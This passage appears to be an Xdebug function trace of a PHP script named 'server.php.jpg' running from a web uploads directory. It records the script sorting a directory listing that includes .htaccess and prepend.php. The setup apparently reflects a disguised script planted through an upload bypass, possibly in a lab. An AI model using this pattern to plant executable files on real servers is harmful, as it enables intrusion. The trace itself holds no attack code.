4	190	0	0.010673	800832	quicksort	1		/var/www/html/uploads/server.php.jpg	915	4	[0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	0	2	'filename'
5	191	0	0.010730	800832	floor	0		/var/www/html/uploads/server.php.jpg	929	1	1
5	191	1	0.010747	800864
5	191	R			1
4		A						/var/www/html/uploads/server.php.jpg	929	$cmp = '.'
4		A						/var/www/html/uploads/server.php.jpg	931	$l = 0
4		A						/var/www/html/uploads/server.php.jpg	932	$r = 2
4		A						/var/www/html/uploads/server.php.jpg	937	$r--
4		A						/var/www/html/uploads/server.php.jpg	941	$tmp = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4		A						/var/www/html/uploads/server.php.jpg	942	$array[0] = ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4		A						/var/www/html/uploads/server.php.jpg	943	$array[1] = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4		A						/var/www/html/uploads/server.php.jpg	945	$l++
4		A						/var/www/html/uploads/server.php.jpg	946	$r--
5	192	0	0.010950	800832	quicksort	1		/var/www/html/uploads/server.php.jpg	952	4	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	0	0	'filename'
5	192	1	0.011008	800832
5	193	0	0.011018	800832	quicksort	1		/var/www/html/uploads/server.php.jpg	953	4	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	1	2	'filename'
6	194	0	0.011073	800832	floor	0		/var/www/html/uploads/server.php.jpg	929	1	1.5
6	194	1	0.011090	800864
6	194	R			1
5		A						/var/www/html/uploads/server.php.jpg	929	$cmp = '..'
5		A						/var/www/html/uploads/server.php.jpg	931	$l = 1
5		A						/var/www/html/uploads/server.php.jpg	932	$r = 2
5		A						/var/www/html/uploads/server.php.jpg	937	$r--
5		A						/var/www/html/uploads/server.php.jpg	941	$tmp = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
5		A						/var/www/html/uploads/server.php.jpg	942	$array[1] = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
5		A						/var/www/html/uploads/server.php.jpg	943	$array[1] = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
5		A						/var/www/html/uploads/server.php.jpg	945	$l++
5		A						/var/www/html/uploads/server.php.jpg	946	$r--
6	195	0	0.011290	800832	quicksort	1		/var/www/html/uploads/server.php.jpg	952	4	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	1	0	'filename'
6	195	1	0.011348	800832
6	196	0	0.011357	800832	quicksort	1		/var/www/html/uploads/server.php.jpg	953	4	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	2	2	'filename'
6	196	1	0.011413	800832
5	193	1	0.011422	800832
4	190	1	0.011431	800832
4	197	0	0.011441	800856	sizeof	0		/var/www/html/uploads/server.php.jpg	918	1	[0 => ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	197	1	0.011500	800888
4	197	R			3
4	198	0	0.011517	800856	quicksort	1		/var/www/html/uploads/server.php.jpg	918	4	[0 => ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]	0	2	'filename'
5	199	0	0.011576	800856	floor	0		/var/www/html/uploads/server.php.jpg	929	1	1
5	199	1	0.011593	800888
5	199	R			1
4		A						/var/www/html/uploads/server.php.jpg	929	$cmp = 'prepend.php'
4		A						/var/www/html/uploads/server.php.jpg	931	$l = 0
4		A						/var/www/html/uploads/server.php.jpg	932	$r = 2
4		A						/var/www/html/uploads/server.php.jpg	941	$tmp = ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
4		A						/var/www/html/uploads/server.php.jpg	942	$array[0] = ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']
4		A						/var/www/html/uploads/server.php.jpg	943	$array[2] = ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
4		A						/var/www/html/uploads/server.php.jpg	945	$l++
4		A						/var/www/html/uploads/server.php.jpg	946	$r--
4		A						/var/www/html/uploads/server.php.jpg	941	$tmp = ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4		A						/var/www/html/uploads/server.php.jpg	942	$array[1] = ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4		A						/var/www/html/uploads/server.php.jpg	943	$array[1] = ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4		A						/var/www/html/uploads/server.php.jpg	945	$l++
4		A						/var/www/html/uploads/server.php.jpg	946	$r--
5	200	0	0.011909	800856	quicksort	1		/var/www/html/uploads/server.php.jpg	952	4	[0 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]	0	0	'filename'
5	200	1	0.011971	800856
5	201	0	0.011981	800856	quicksort	1		/var/www/html/uploads/server.php.jpg	953	4	[0 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]	2	2	'filename'
5	201	1	0.012039	800856
4	198	1	0.012049	800856
4	202	0	0.012058	800856	array_merge	0		/var/www/html/uploads/server.php.jpg	921	2	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	[0 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	202	1	0.012147	801296
4	202	R			[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
3	181	1	0.012241	800432
3	181	R			[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
2		A						/var/www/html/uploads/server.php.jpg	1213	$list = [0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 